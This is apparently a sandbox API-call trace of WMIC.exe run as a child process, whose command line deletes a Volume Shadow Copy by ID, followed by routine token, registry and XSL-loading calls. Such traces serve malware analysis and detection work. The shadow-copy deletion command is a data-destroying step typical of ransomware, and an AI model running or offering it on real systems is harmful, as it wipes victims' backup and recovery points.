"c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x7546f000" os_pid = "0xaf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x84c" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 165 os_tid = 0xa70 [0100.140] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf950 | out: lpSystemTimeAsFileTime=0x1cf950*(dwLowDateTime=0x43479f90, dwHighDateTime=0x1d68245)) [0100.140] GetCurrentProcessId () returned 0xaf8 [0100.140] GetCurrentThreadId () returned 0xa70 [0100.140] GetTickCount () returned 0x114ebe5 [0100.140] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf958 | out: lpPerformanceCount=0x1cf958*=22003282296) returned 1 [0100.144] GetModuleHandleW (lpModuleName=0x0) returned 0xff1c0000 [0100.144] __set_app_type (_Type=0x1) [0100.144] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff20ced0) returned 0x0 [0100.144] __wgetmainargs (in: _Argc=0xff232380, _Argv=0xff232390, _Env=0xff232388, _DoWildCard=0, _StartInfo=0xff23239c | out: _Argc=0xff232380, _Argv=0xff232390, _Env=0xff232388) returned 0 [0100.144] ??0CHString@@QEAA@XZ () returned 0xff232ab0 [0100.145] malloc (_Size=0x30) returned 0x265a50 [0100.145] malloc (_Size=0x70) returned 0x265a90 [0100.145] malloc (_Size=0x50) returned 0x267d30 [0100.145] malloc (_Size=0x30) returned 0x267d90 [0100.145] malloc (_Size=0x48) returned 0x267dd0 [0100.146] malloc (_Size=0x30) returned 0x267e20 [0100.146] malloc (_Size=0x30) returned 0x267e60 [0100.146] ??0CHString@@QEAA@XZ () returned 0xff232f58 [0100.146] malloc (_Size=0x30) returned 0x267ea0 [0100.146] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0100.146] SetConsoleCtrlHandler (HandlerRoutine=0xff205724, Add=1) returned 1 [0100.146] _onexit (_Func=0xff21f378) returned 0xff21f378 [0100.146] _onexit (_Func=0xff21f490) returned 0xff21f490 [0100.146] _onexit (_Func=0xff21f4d0) returned 0xff21f4d0 [0100.146] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0100.146] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0100.150] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0100.172] CoCreateInstance (in: rclsid=0xff1c73a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff1c7370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff232940 | out: ppv=0xff232940*=0x1da1390) returned 0x0 [0100.181] GetCurrentProcess () returned 0xffffffffffffffff [0100.181] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1cf720 | out: TokenHandle=0x1cf720*=0xf4) returned 1 [0100.181] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cf718 | out: TokenInformation=0x0, ReturnLength=0x1cf718) returned 0 [0100.181] malloc (_Size=0x118) returned 0x2669a0 [0100.181] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x2669a0, TokenInformationLength=0x118, ReturnLength=0x1cf718 | out: TokenInformation=0x2669a0, ReturnLength=0x1cf718) returned 1 [0100.182] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x2669a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=613940765, Attributes=0x336), (Luid.LowPart=0x0, Luid.HighPart=2522848, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0100.182] free (_Block=0x2669a0) [0100.182] CloseHandle (hObject=0xf4) returned 1 [0100.182] malloc (_Size=0x40) returned 0x267ee0 [0100.182] malloc (_Size=0x40) returned 0x267f30 [0100.182] malloc (_Size=0x40) returned 0x267f80 [0100.182] malloc (_Size=0x20a) returned 0x2669a0 [0100.182] GetSystemDirectoryW (in: lpBuffer=0x2669a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.182] free (_Block=0x2669a0) [0100.182] malloc (_Size=0x18) returned 0x3adfb0 [0100.187] malloc (_Size=0x18) returned 0x2669a0 [0100.187] malloc (_Size=0x18) returned 0x2669c0 [0100.187] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0100.187] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0100.187] free (_Block=0x3adfb0) [0100.187] free (_Block=0x2669a0) [0100.187] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0100.188] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0100.188] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0100.188] FreeLibrary (hLibModule=0x77940000) returned 1 [0100.188] free (_Block=0x2669c0) [0100.188] _vsnwprintf (in: _Buffer=0x267f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x1cf348 | out: _Buffer="ms_409") returned 6 [0100.189] malloc (_Size=0x20) returned 0x2669a0 [0100.189] GetComputerNameW (in: lpBuffer=0x2669a0, nSize=0x1cf720 | out: lpBuffer="XDUWTFONO", nSize=0x1cf720) returned 1 [0100.189] lstrlenW (lpString="XDUWTFONO") returned 9 [0100.189] malloc (_Size=0x14) returned 0x3adfb0 [0100.189] lstrlenW (lpString="XDUWTFONO") returned 9 [0100.189] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x1cf718 | out: lpNameBuffer=0x0, nSize=0x1cf718) returned 0x7fffffdd000 [0100.190] GetLastError () returned 0xea [0100.190] malloc (_Size=0x40) returned 0x2669d0 [0100.190] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2669d0, nSize=0x1cf718 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cf718) returned 0x1 [0100.191] lstrlenW (lpString="") returned 0 [0100.191] lstrlenW (lpString="XDUWTFONO") returned 9 [0100.191] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0100.192] lstrlenW (lpString=".") returned 1 [0100.192] lstrlenW (lpString="XDUWTFONO") returned 9 [0100.192] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0100.192] lstrlenW (lpString="LOCALHOST") returned 9 [0100.192] lstrlenW (lpString="XDUWTFONO") returned 9 [0100.193] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0100.193] lstrlenW (lpString="XDUWTFONO") returned 9 [0100.193] lstrlenW (lpString="XDUWTFONO") returned 9 [0100.193] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0100.193] free (_Block=0x3adfb0) [0100.193] lstrlenW (lpString="XDUWTFONO") returned 9 [0100.193] malloc (_Size=0x14) returned 0x3adfb0 [0100.193] lstrlenW (lpString="XDUWTFONO") returned 9 [0100.193] lstrlenW (lpString="XDUWTFONO") returned 9 [0100.193] malloc (_Size=0x14) returned 0x266a20 [0100.193] lstrlenW (lpString="XDUWTFONO") returned 9 [0100.193] malloc (_Size=0x8) returned 0x266a40 [0100.193] malloc (_Size=0x18) returned 0x266a60 [0100.193] malloc (_Size=0x30) returned 0x266a80 [0100.193] malloc (_Size=0x18) returned 0x266ac0 [0100.194] SysStringLen (param_1="IDENTIFY") returned 0x8 [0100.194] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0100.194] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0100.194] SysStringLen (param_1="IDENTIFY") returned 0x8 [0100.194] malloc (_Size=0x30) returned 0x266ae0 [0100.194] malloc (_Size=0x18) returned 0x266b20 [0100.194] SysStringLen (param_1="IMPERSONATE") returned 0xb [0100.194] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0100.194] SysStringLen (param_1="IMPERSONATE") returned 0xb [0100.194] SysStringLen (param_1="IDENTIFY") returned 0x8 [0100.194] SysStringLen (param_1="IDENTIFY") returned 0x8 [0100.194] SysStringLen (param_1="IMPERSONATE") returned 0xb [0100.194] malloc (_Size=0x30) returned 0x266b40 [0100.194] malloc (_Size=0x18) returned 0x266b80 [0100.194] SysStringLen (param_1="DELEGATE") returned 0x8 [0100.194] SysStringLen (param_1="IDENTIFY") returned 0x8 [0100.194] SysStringLen (param_1="DELEGATE") returned 0x8 [0100.194] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0100.194] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0100.194] SysStringLen (param_1="DELEGATE") returned 0x8 [0100.194] malloc (_Size=0x30) returned 0x266ba0 [0100.195] malloc (_Size=0x18) returned 0x266be0 [0100.195] malloc (_Size=0x30) returned 0x266c00 [0100.195] malloc (_Size=0x18) returned 0x266c40 [0100.195] SysStringLen (param_1="NONE") returned 0x4 [0100.195] SysStringLen (param_1="DEFAULT") returned 0x7 [0100.195] SysStringLen (param_1="DEFAULT") returned 0x7 [0100.195] SysStringLen (param_1="NONE") returned 0x4 [0100.195] malloc (_Size=0x30) returned 0x266c60 [0100.195] malloc (_Size=0x18) returned 0x266ca0 [0100.195] SysStringLen (param_1="CONNECT") returned 0x7 [0100.195] SysStringLen (param_1="DEFAULT") returned 0x7 [0100.195] malloc (_Size=0x30) returned 0x266cc0 [0100.195] malloc (_Size=0x18) returned 0x266d00 [0100.195] SysStringLen (param_1="CALL") returned 0x4 [0100.195] SysStringLen (param_1="DEFAULT") returned 0x7 [0100.195] SysStringLen (param_1="CALL") returned 0x4 [0100.195] SysStringLen (param_1="CONNECT") returned 0x7 [0100.195] malloc (_Size=0x30) returned 0x266d20 [0100.195] malloc (_Size=0x18) returned 0x266d60 [0100.195] SysStringLen (param_1="PKT") returned 0x3 [0100.195] SysStringLen (param_1="DEFAULT") returned 0x7 [0100.195] SysStringLen (param_1="PKT") returned 0x3 [0100.195] SysStringLen (param_1="NONE") returned 0x4 [0100.195] SysStringLen (param_1="NONE") returned 0x4 [0100.195] SysStringLen (param_1="PKT") returned 0x3 [0100.195] malloc (_Size=0x30) returned 0x266d80 [0100.195] malloc (_Size=0x18) returned 0x266dc0 [0100.195] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0100.196] SysStringLen (param_1="DEFAULT") returned 0x7 [0100.196] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0100.196] SysStringLen (param_1="NONE") returned 0x4 [0100.196] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0100.196] SysStringLen (param_1="PKT") returned 0x3 [0100.196] SysStringLen (param_1="PKT") returned 0x3 [0100.196] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0100.196] malloc (_Size=0x30) returned 0x268000 [0100.196] malloc (_Size=0x18) returned 0x266de0 [0100.197] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0100.197] SysStringLen (param_1="DEFAULT") returned 0x7 [0100.197] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0100.197] SysStringLen (param_1="PKT") returned 0x3 [0100.197] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0100.197] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0100.197] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0100.197] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0100.197] malloc (_Size=0x30) returned 0x268040 [0100.197] malloc (_Size=0x40) returned 0x266e00 [0100.197] malloc (_Size=0x20a) returned 0x266e50 [0100.197] GetSystemDirectoryW (in: lpBuffer=0x266e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.197] free (_Block=0x266e50) [0100.197] malloc (_Size=0x18) returned 0x266e50 [0100.197] malloc (_Size=0x18) returned 0x266e70 [0100.197] malloc (_Size=0x18) returned 0x266e90 [0100.197] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0100.197] SysStringLen (param_1="\\wbem\\") returned 0x6 [0100.198] free (_Block=0x266e50) [0100.198] free (_Block=0x266e70) [0100.198] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0100.198] free (_Block=0x266e90) [0100.198] malloc (_Size=0x18) returned 0x266e50 [0100.198] malloc (_Size=0x18) returned 0x266e70 [0100.198] malloc (_Size=0x18) returned 0x266e90 [0100.198] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0100.198] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0100.198] free (_Block=0x266e50) [0100.198] free (_Block=0x266e70) [0100.198] GetCurrentThreadId () returned 0xa70 [0100.198] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x1cf020 | out: phkResult=0x1cf020*=0xf8) returned 0x0 [0100.198] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x1cf070, lpcbData=0x1cf010*=0x400 | out: lpType=0x0, lpData=0x1cf070*=0x30, lpcbData=0x1cf010*=0x4) returned 0x0 [0100.198] _wcsicmp (_String1="0", _String2="1") returned -1 [0100.198] _wcsicmp (_String1="0", _String2="2") returned -2 [0100.199] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1cf010*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x1cf010*=0x42) returned 0x0 [0100.199] malloc (_Size=0x86) returned 0x266eb0 [0100.199] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x266eb0, lpcbData=0x1cf010*=0x42 | out: lpType=0x0, lpData=0x266eb0*=0x25, lpcbData=0x1cf010*=0x42) returned 0x0 [0100.199] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0100.199] malloc (_Size=0x42) returned 0x266f40 [0100.199] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0100.199] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x1cf070, lpcbData=0x1cf010*=0x400 | out: lpType=0x0, lpData=0x1cf070*=0x36, lpcbData=0x1cf010*=0xc) returned 0x0 [0100.199] _wtol (_String="65536") returned 65536 [0100.199] free (_Block=0x266eb0) [0100.199] RegCloseKey (hKey=0x0) returned 0x6 [0100.199] CoCreateInstance (in: rclsid=0xff1c7410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff1c73f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x1cf518 | out: ppv=0x1cf518*=0x1c571d0) returned 0x0 [0100.217] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x1c571d0, xmlSource=0x1cf660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x266e50), isSuccessful=0x1cf6d0 | out: isSuccessful=0x1cf6d0*=0xffff) returned 0x0 [0100.353] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x1c571d0, DOMElement=0x1cf510 | out: DOMElement=0x1cf510) returned 0x0 [0100.353] malloc (_Size=0x18) returned 0x266e50 [0100.354] free (_Block=0x266e50) [0100.354] malloc (_Size=0x18) returned 0x266e50 [0100.354] free (_Block=0x266e50) [0100.354] malloc (_Size=0x18) returned 0x266e50 [0100.354] malloc (_Size=0x18) returned 0x266e70 [0100.354] malloc (_Size=0x30) returned 0x268080 [0100.355] malloc (_Size=0x18) returned 0x266eb0 [0100.355] free (_Block=0x266eb0) [0100.355] malloc (_Size=0x18) returned 0x26c560 [0100.355] malloc (_Size=0x18) returned 0x26c580 [0100.355] SysStringLen (param_1="VALUE") returned 0x5 [0100.355] SysStringLen (param_1="TABLE") returned 0x5 [0100.355] SysStringLen (param_1="TABLE") returned 0x5 [0100.355] SysStringLen (param_1="VALUE") returned 0x5 [0100.355] malloc (_Size=0x30) returned 0x2680c0 [0100.355] malloc (_Size=0x18) returned 0x26c5a0 [0100.356] free (_Block=0x26c5a0) [0100.356] malloc (_Size=0x18) returned 0x26c5a0 [0100.356] malloc (_Size=0x18) returned 0x26c5c0 [0100.356] SysStringLen (param_1="LIST") returned 0x4 [0100.356] SysStringLen (param_1="TABLE") returned 0x5 [0100.356] malloc (_Size=0x30) returned 0x268100 [0100.356] malloc (_Size=0x18) returned 0x26c5e0 [0100.356] free (_Block=0x26c5e0) [0100.356] malloc (_Size=0x18) returned 0x26c5e0 [0100.356] malloc (_Size=0x18) returned 0x26c600 [0100.356] SysStringLen (param_1="RAWXML") returned 0x6 [0100.356] SysStringLen (param_1="TABLE") returned 0x5 [0100.356] SysStringLen (param_1="RAWXML") returned 0x6 [0100.356] SysStringLen (param_1="LIST") returned 0x4 [0100.356] SysStringLen (param_1="LIST") returned 0x4 [0100.356] SysStringLen (param_1="RAWXML") returned 0x6 [0100.356] malloc (_Size=0x30) returned 0x268140 [0100.357] malloc (_Size=0x18) returned 0x26c620 [0100.357] free (_Block=0x26c620) [0100.357] malloc (_Size=0x18) returned 0x26c620 [0100.357] malloc (_Size=0x18) returned 0x26c640 [0100.357] SysStringLen (param_1="HTABLE") returned 0x6 [0100.357] SysStringLen (param_1="TABLE") returned 0x5 [0100.357] SysStringLen (param_1="HTABLE") returned 0x6 [0100.357] SysStringLen (param_1="LIST") returned 0x4 [0100.357] malloc (_Size=0x30) returned 0x268180 [0100.357] malloc (_Size=0x18) returned 0x26c660 [0100.358] free (_Block=0x26c660) [0100.358] malloc (_Size=0x18) returned 0x26c660 [0100.358] malloc (_Size=0x18) returned 0x26c680 [0100.358] SysStringLen (param_1="HFORM") returned 0x5 [0100.358] SysStringLen (param_1="TABLE") returned 0x5 [0100.358] SysStringLen (param_1="HFORM") returned 0x5 [0100.358] SysStringLen (param_1="LIST") returned 0x4 [0100.358] SysStringLen (param_1="HFORM") returned 0x5 [0100.358] SysStringLen (param_1="HTABLE") returned 0x6 [0100.358] malloc (_Size=0x30) returned 0x2681c0 [0100.358] malloc (_Size=0x18) returned 0x26c6a0 [0100.358] free (_Block=0x26c6a0) [0100.358] malloc (_Size=0x18) returned 0x26c6a0 [0100.358] malloc (_Size=0x18) returned 0x26c6c0 [0100.358] SysStringLen (param_1="XML") returned 0x3 [0100.358] SysStringLen (param_1="TABLE") returned 0x5 [0100.358] SysStringLen (param_1="XML") returned 0x3 [0100.358] SysStringLen (param_1="VALUE") returned 0x5 [0100.359] SysStringLen (param_1="VALUE") returned 0x5 [0100.359] SysStringLen (param_1="XML") returned 0x3 [0100.359] malloc (_Size=0x30) returned 0x268200 [0100.359] malloc (_Size=0x18) returned 0x26c6e0 [0100.359] free (_Block=0x26c6e0) [0100.359] malloc (_Size=0x18) returned 0x26c6e0 [0100.359] malloc (_Size=0x18) returned 0x26c700 [0100.359] SysStringLen (param_1="MOF") returned 0x3 [0100.359] SysStringLen (param_1="TABLE") returned 0x5 [0100.359] SysStringLen (param_1="MOF") returned 0x3 [0100.359] SysStringLen (param_1="LIST") returned 0x4 [0100.359] SysStringLen (param_1="MOF") returned 0x3 [0100.359] SysStringLen (param_1="RAWXML") returned 0x6 [0100.359] SysStringLen (param_1="LIST") returned 0x4 [0100.359] SysStringLen (param_1="MOF") returned 0x3 [0100.359] malloc (_Size=0x30) returned 0x268240 [0100.360] malloc (_Size=0x18) returned 0x26c720 [0100.360] free (_Block=0x26c720) [0100.360] malloc (_Size=0x18) returned 0x26c720 [0100.360] malloc (_Size=0x18) returned 0x26c740 [0100.360] SysStringLen (param_1="CSV") returned 0x3 [0100.360] SysStringLen (param_1="TABLE") returned 0x5 [0100.360] SysStringLen (param_1="CSV") returned 0x3 [0100.360] SysStringLen (param_1="LIST") returned 0x4 [0100.360] SysStringLen (param_1="CSV") returned 0x3 [0100.360] SysStringLen (param_1="HTABLE") returned 0x6 [0100.360] SysStringLen (param_1="CSV") returned 0x3 [0100.360] SysStringLen (param_1="HFORM") returned 0x5 [0100.360] malloc (_Size=0x30) returned 0x268280 [0100.360] malloc (_Size=0x18) returned 0x26c760 [0100.360] free (_Block=0x26c760) [0100.360] malloc (_Size=0x18) returned 0x26c760 [0100.361] malloc (_Size=0x18) returned 0x26c780 [0100.361] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0100.361] SysStringLen (param_1="TABLE") returned 0x5 [0100.361] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0100.361] SysStringLen (param_1="VALUE") returned 0x5 [0100.361] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0100.361] SysStringLen (param_1="XML") returned 0x3 [0100.361] SysStringLen (param_1="XML") returned 0x3 [0100.361] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0100.361] malloc (_Size=0x30) returned 0x2682c0 [0100.361] malloc (_Size=0x18) returned 0x26c7a0 [0100.361] free (_Block=0x26c7a0) [0100.361] malloc (_Size=0x18) returned 0x26c7a0 [0100.361] malloc (_Size=0x18) returned 0x26c7c0 [0100.361] SysStringLen (param_1="texttablewsys") returned 0xd [0100.361] SysStringLen (param_1="TABLE") returned 0x5 [0100.361] SysStringLen (param_1="texttablewsys") returned 0xd [0100.361] SysStringLen (param_1="XML") returned 0x3 [0100.362] SysStringLen (param_1="texttablewsys") returned 0xd [0100.362] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0100.362] SysStringLen (param_1="XML") returned 0x3 [0100.362] SysStringLen (param_1="texttablewsys") returned 0xd [0100.362] malloc (_Size=0x30) returned 0x268300 [0100.362] malloc (_Size=0x18) returned 0x26c7e0 [0100.362] free (_Block=0x26c7e0) [0100.362] malloc (_Size=0x18) returned 0x26c7e0 [0100.362] malloc (_Size=0x18) returned 0x26c800 [0100.362] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0100.363] SysStringLen (param_1="TABLE") returned 0x5 [0100.363] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0100.363] SysStringLen (param_1="XML") returned 0x3 [0100.363] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0100.363] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0100.363] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0100.363] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0100.363] malloc (_Size=0x30) returned 0x268340 [0100.363] malloc (_Size=0x18) returned 0x26c820 [0100.363] free (_Block=0x26c820) [0100.363] malloc (_Size=0x18) returned 0x26c820 [0100.363] malloc (_Size=0x18) returned 0x26c840 [0100.363] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0100.363] SysStringLen (param_1="TABLE") returned 0x5 [0100.363] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0100.363] SysStringLen (param_1="XML") returned 0x3 [0100.363] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0100.363] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0100.363] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0100.364] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0100.364] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0100.364] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0100.364] malloc (_Size=0x30) returned 0x268380 [0100.364] malloc (_Size=0x18) returned 0x26c860 [0100.364] free (_Block=0x26c860) [0100.364] malloc (_Size=0x18) returned 0x26c860 [0100.364] malloc (_Size=0x18) returned 0x26c880 [0100.364] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0100.364] SysStringLen (param_1="TABLE") returned 0x5 [0100.364] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0100.364] SysStringLen (param_1="XML") returned 0x3 [0100.364] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0100.364] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0100.364] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0100.364] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0100.364] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0100.364] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0100.364] malloc (_Size=0x30) returned 0x2683c0 [0100.365] malloc (_Size=0x18) returned 0x26c8a0 [0100.365] free (_Block=0x26c8a0) [0100.365] malloc (_Size=0x18) returned 0x26c8a0 [0100.365] malloc (_Size=0x18) returned 0x26c8c0 [0100.365] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0100.365] SysStringLen (param_1="TABLE") returned 0x5 [0100.365] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0100.365] SysStringLen (param_1="XML") returned 0x3 [0100.365] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0100.365] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0100.365] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0100.365] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0100.365] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0100.365] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0100.365] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0100.365] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0100.365] malloc (_Size=0x30) returned 0x268400 [0100.366] malloc (_Size=0x18) returned 0x26c8e0 [0100.366] free (_Block=0x26c8e0) [0100.366] malloc (_Size=0x18) returned 0x26c8e0 [0100.366] malloc (_Size=0x18) returned 0x26c900 [0100.366] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0100.366] SysStringLen (param_1="TABLE") returned 0x5 [0100.366] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0100.366] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0100.366] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0100.366] SysStringLen (param_1="XML") returned 0x3 [0100.366] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0100.366] 